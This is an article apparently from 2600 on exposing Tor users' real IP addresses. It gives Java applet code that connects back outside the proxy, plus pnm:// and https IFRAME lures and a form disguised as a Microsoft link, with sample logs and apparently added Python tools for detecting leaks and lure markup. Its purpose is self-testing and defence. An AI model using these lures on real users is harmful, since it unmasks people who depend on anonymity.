Exposing Tor Users' Real IPs

After I wrote my article in the Fall 2005 issue of 2600, I began to wonder if there was a way to find out the real IP address a Tor user was coming from as they moved through that system. I can now confirm that a Java applet can reveal the real IP address of a Tor visitor to a website. In other cases, a Tor user's real IP address can be exposed, even when not using a Java-enabled browser. The purpose of this article is to report my findings on this matter. If you don't know what Tor is, I suggest you look it up on the web.

For the purposes of this article, in order to follow along, you will need two computers on separate internet connections. Do not use the same LAN, since all you'll see are internal IPs and you don't really get a good sense of how all this works unless you see the IP connections. The first computer will serve as your nemesis. Your nemesis, oh let's say the FBI, knows you use Tor to do certain research projects on certain government agencies. They want to lure you to a special website that may expose your IP. They have set up a Linux workstation that is running Apache. The second computer is yours and, for argument's sake, let it be a Windows XP machine. Java is installed and working properly. If you're following along, you're playing both roles, FBI and miscreant. Let's define some variables for this example (none of them are real, by the way):

Your real IP: 32.44.66.88

A Tor Server IP: 99.88.44.11 (this is the contacting Tor server in a chain of servers that contacts the "FBI" server that will serve up the webpage.)

The "FBI" server IP: 200.100.35.25

If you are doing this at home and your "FBI" website is connected to broadband, you may have to use a port other than 80. Some broadband companies forbid inbound traffic on certain ports to their customers' computers for obvious reasons. However, they don't necessarily block the upper ports. Also, your "FBI" website must not have inbound traffic NATed, otherwise you won't see the real IP of your second machine making the calls, just internal ones. Your second machine could be dialed into another internet account, such as an AOL account or a VPN account.

Anyway, in your "Agent Fairbanks" role, you will have created a simple html file (I'll call it gotcha.html for this example) with code similar to this:

<html><body><h1>Test</h1>
<applet code="test.class" width=1 height=1></applet>
</body></html>

The code for the Java applet is very simple:

import java.applet.*;
import java.awt.*;
import java.net.*;
import java.io.*;

public class test extends Applet {

    public void init() {}

    public void start() {
        try {
            // Connect straight back to the host the applet was served from. The sandbox
            // allows this, and the connection is opened by the Java runtime, not by the
            // proxied browser, so it never goes through Privoxy/Tor.
            InetAddress addr = InetAddress.getByName("200.100.35.25");
            int port = 80;
            Socket sock = new Socket(addr, port);

            BufferedReader rd = new BufferedReader(new InputStreamReader(sock.getInputStream()));
            BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(sock.getOutputStream()));
            // A bare HTTP/0.9-style request line, which is why the access_log entry
            // later on shows no HTTP version after the path.
            wr.write("GET /nonexistentpage.html");
            wr.flush();
            wr.write("\n\n\n");
            wr.flush();

            String str;
            while ((str = rd.readLine()) != null) {
                System.out.println(str);
            }
            rd.close();
            sock.close();
        } catch (Exception e) {
            System.out.println("" + e);
        }
    }

    public void stop() {}

    // Was "destroyed()" in the original listing; the applet lifecycle only calls destroy().
    public void destroy() {}

    public void paint(Graphics g) {}

} // end applet class

In this article I assume "Agent Fairbanks" knows how to compile an applet. Anyway, in your miscreant role, you would have installed the Windows version of Tor and Privoxy which can be found on the Tor website. Just follow the directions on how to set up both of them. As you visit the "FBI" server and browse the gotcha.html, the applet makes a call back to the "FBI" server asking for a page which doesn't exist on that server. But wait, you say! I thought an applet couldn't use the network classes in the default security settings of the sandbox? That's not exactly true. An applet can communicate back to the server from where it came, in this case, the "FBI" server to which you were lured. And when it does, it bypasses the Tor system and communicates out through your connection to your ISP, thereby exposing your real IP to "Agent Fairbanks'" server. This is an example of what "Agent Fairbanks" might see in his logs as your IE browser visited the gotcha.html page (IPs, dates, and times have been changed to protect the real miscreant):

99.88.44.11 - - [12/Jan/2007:17:31:40 -0100] "GET /gotcha.html HTTP/1.0" 200 96 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
99.88.44.11 - - [12/Jan/2007:17:31:42 -0100] "GET /test.class HTTP/1.1" 304 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.4.2_08"
32.44.66.88 - - [12/Jan/2007:17:31:43 -0100] "GET /nonexistentpage.html" 404 1047 "-" "-"

If "Agent Fairbanks" is smart, he would be cat'ing the Apache access_log file and grepping for that unusually named nonexistent webpage that the applet tried to retrieve. At this point, you're probably thinking, "I'll just disable Java or use a browser that doesn't support Java. I'll be safe." As in the words of Han Solo in the original 1977 Star Wars movie, "Don't get cocky, kid."

Northern Tor Exposure

If you followed the Tor and Privoxy instructions, you were told to set your proxy for the IE browser to IP 127.0.0.1 and the port to 8118. The good thing about IE is that when you do that, it also sets all the protocols, such as https, gopher, and ftp, to that proxy as well. Unfortunately, Mozilla does not. But I'll get to Mozilla in a minute. Right now we're still talking about the IE browser on Windows XP. So, you've disabled Java and you're feeling confident, aren't you? Well, here's a thought: does the IE browser support other protocols that may not have been automatically set to the proxy settings of your browser? The answer is yes, there is one that I can think of. This may not be the case on all XP machines because I haven't tested enough of them, but enter this in your browser's URL window: pnm://200.100.35.25:80/nonexistentfile.ra. Assuming you have installed Real Networks, their player should pop up and eventually will time out since it can't find that non-existent file. However, "Agent Fairbanks" would see this in his access_log file:

99.88.44.11 - - [12/Jan/2007:17:45:31 -0100] "GET /nonexistentfile.ra HTTP/1.0" 404 1051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
32.44.66.88 - - [12/Jan/2007:17:45:46 -0100] "PNA" 501 988 "-" "-"

The first line of "Agent Fairbanks'" log entry is the browser making the call through the Tor system. The next line is the Real Networks player making the call out through your ISP connection, exposing your IP to his server. I haven't tested what happens if you don't have the Real Player installed. Does Windows Media Player exhibit the same behavior? Perhaps someone out there could research that.
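If you are playing both roles on your own two machines to audit your setup, the same log pattern tells you whether anything leaked. The following Python script is an added example, not part of the original article: it parses Apache combined-format lines, flags every hit whose client address is not the Tor exit you expect, and pairs it with the Tor-routed request just before it. The sample reuses the article's own fictional log lines (including the https-on-port-80 attempt described further on); the set of Tor exit addresses is an assumption you pass in.

```python
import re
from datetime import datetime

# Apache "combined" log format, as in the access_log excerpts in the article.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# What a browser request line looks like; anything else came from a helper program or a
# raw socket (the applet's HTTP/0.9 GET, RealPlayer's "PNA", an SSL hello sent to port 80).
BROWSER_REQ = re.compile(r'^(GET|HEAD|POST) \S+ HTTP/\d\.\d$')

def parse_line(line):
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return entry

def find_leaks(log_text, tor_exits, window=60):
    """Report every hit that did not arrive via a known Tor exit, paired with the most
    recent Tor-routed request within `window` seconds (the page that triggered it)."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    leaks = []
    for i, e in enumerate(entries):
        if e["ip"] in tor_exits:
            continue                      # traffic that really went through Tor
        lure = None
        for prev in reversed(entries[:i]):
            if prev["ip"] in tor_exits and (e["time"] - prev["time"]).total_seconds() <= window:
                lure = prev["req"]
                break
        leaks.append({"real_ip": e["ip"], "request": e["req"], "lure": lure,
                      "browser_request": bool(BROWSER_REQ.match(e["req"]))})
    return leaks

# Constructed sample: the article's own (fictional) log lines, in time order.
# 99.88.44.11 plays the Tor exit, 32.44.66.88 the user's real address.
SAMPLE_LOG = r"""99.88.44.11 - - [12/Jan/2007:17:24:28 -0100] "GET /iframetest.html HTTP/1.0" 200 150 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
32.44.66.88 - - [12/Jan/2007:17:24:31 -0100] "\x90L\x04\x06" 501 988 "-" "-"
99.88.44.11 - - [12/Jan/2007:17:31:40 -0100] "GET /gotcha.html HTTP/1.0" 200 96 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
99.88.44.11 - - [12/Jan/2007:17:31:42 -0100] "GET /test.class HTTP/1.1" 304 0 "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.4.2_08"
32.44.66.88 - - [12/Jan/2007:17:31:43 -0100] "GET /nonexistentpage.html" 404 1047 "-" "-"
99.88.44.11 - - [12/Jan/2007:17:45:31 -0100] "GET /nonexistentfile.ra HTTP/1.0" 404 1051 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
32.44.66.88 - - [12/Jan/2007:17:45:46 -0100] "PNA" 501 988 "-" "-"
"""

if __name__ == "__main__":
    for leak in find_leaks(SAMPLE_LOG, tor_exits={"99.88.44.11"}):
        print("%(real_ip)s made %(request)r right after %(lure)r came in via Tor" % leak)
```

Any line the script reports while you are the only visitor is a leak of your own address; an empty report means every request your client made went through the exit.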

Anyway, you might be thinking, why would I ever click on a link like that, knowing what I know now? Well, the answer is you might not even know you're exposing your IP until it's too late. There is an issue with the way Microsoft IE handles links and this was discovered by a security researcher who published his findings. Unfortunately, I don't remember his name, so I apologize to him. However, I recall reading somewhere that Microsoft doesn't think this is a vulnerability, although I would assume 100,000 cheering phishers would think otherwise. Here is the snippet of code:

<html><body>
<A href="http://www.microsoft.com">
<FORM action=pnm://200.100.35.25:80/nonexistentfile.ra method=get>
<INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
 CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
 TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com>
</FORM>
</A>
</body></html>

When I test this code with all of the latest patches installed on my XP box, this trick still works. What happens if you view this page in your browser is that you will see a link pointing to www.microsoft.com. When you move your mouse cursor over the link, the status bar at the bottom of the browser also shows www.microsoft.com. But when you actually click on the link, you don't go to Microsoft's website, but rather to the server of "Agent Fairbanks."

But, hey, "Agent Fairbanks" doesn't even need to get you to click on a link. All he needs is a page that uses the IFRAME tag:

<html><body><h1>Frame Test</h1>
<IFRAME src="pnm://200.100.35.25:80/nonexistentfile.ra" width=1 height=1 scrolling="no" frameborder=0></IFRAME>
</body></html>

So, you're sick of Microsoft and IE and a java-enabled browser and decide to use Mozilla on Linux. You're safe, right? Not necessarily. Mozilla by default doesn't have Java set up, but it can be. But let's say you don't want Java. Okay, what about the pnm hack, does that work in Mozilla? By default, no, it doesn't because Mozilla doesn't support that protocol. But, remember back when I said that Microsoft IE automatically sets the other protocols to the same proxy when you set the http protocol? Well, guess what. Mozilla does not do that. And if you forget to set the other protocols, all "Agent Fairbanks" has to do is change the src for the IFRAME code above to point to https://200.100.35.25:80/nonexistentfile.html and he will see something similar to this in his access_log file (values have been deliberately changed):

99.88.44.11 - - [12/Jan/2007:17:24:28 -0100] "GET /iframetest.html HTTP/1.0" 200 150 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
32.44.66.88 - - [12/Jan/2007:17:24:31 -0100] "\x90L\x04\x06" 501 988 "-" "-"

The funky characters after the date/timestamp are your browser's SSL connection trying to talk to a non-https port. And although this causes a 501 error, it would still allow "Agent Fairbanks" to grep those lines and compare them to the calls for the iframetest.html page. Of course, if you're that paranoid, you could always use wget to first grab a suspicious page and then 'vi' it (don't open it in your browser) to look at the code. All you have to do is set up wget to use the Tor system by creating a ".wgetrc" file in the home directory of whatever user you're logged in as and adding this one line: HTTP_PROXY=127.0.0.1:8118. Wget is merely going to grab the HTTP source code and won't execute any applets or iframes.
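If you take the wget route, you can go one step further than reading the source in vi. The following Python scanner is an added example, not from the article: it walks a fetched page without rendering it and reports the three lure constructs discussed above, namely an applet, a form submit button wrapped inside a link, and frames or images whose src uses a scheme other than plain http (which your proxy setting may not cover). The sample page is constructed from the article's own snippets.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

class LeakVectorScanner(HTMLParser):
    """Flags markup that can make a client connect outside the browser's HTTP proxy."""

    def __init__(self):
        super().__init__()
        self.findings = []   # (what, target) pairs in document order
        self._anchor = None  # href of the <a> we are currently inside, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "applet":                               # Java socket back to origin bypasses Tor
            self.findings.append(("applet", a.get("code", "?")))
        elif tag == "a":
            self._anchor = a.get("href")
        elif tag in ("iframe", "frame", "embed", "img"):    # fetched automatically, no click needed
            self._check(tag, a.get("src"))
        elif tag == "form":
            self._check("form", a.get("action"))
            if self._anchor is not None:                  # submit button disguised as a link
                self.findings.append(("form inside link", self._anchor))

    def handle_endtag(self, tag):
        if tag == "a":
            self._anchor = None

    def _check(self, where, url):
        # Anything but plain http may fall outside the browser's proxy setting:
        # pnm:// is handed to RealPlayer, https:// is unproxied in Mozilla unless you set it.
        scheme = urlsplit(url or "").scheme.lower()
        if scheme and scheme != "http":
            self.findings.append((where + " non-http target", url))

def scan_html(text):
    """List the leak vectors in an HTML document without executing any of it."""
    scanner = LeakVectorScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

# Constructed sample: the article's three lure snippets plus some harmless markup.
SAMPLE_PAGE = """<html><body><applet code="test.class" width=1 height=1></applet>
<A href="http://www.microsoft.com"><FORM action=pnm://200.100.35.25:80/nonexistentfile.ra method=get>
<INPUT type=submit value=http://www.microsoft.com></FORM></A>
<IFRAME src="https://200.100.35.25:80/nonexistentfile.html" width=1 height=1></IFRAME>
<a href="/about.html">about</a><img src="logo.gif"></body></html>"""
```

Feed it the file wget saved (for example `scan_html(open("gotcha.html").read())`); an empty list means none of these constructs is present, though it says nothing about scripts or plugins the scanner does not know about.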

To recap, if you want to keep better anonymity using the Tor system, you should do these things:

1. Don't use a Java-enabled browser or disable Java while using Tor.
2. Set ALL proxy protocols to the same thing, even if you're not going to use them.
3. Be very paranoid of website links that may have been emailed to you, especially if you're using Windows.

tkcntry001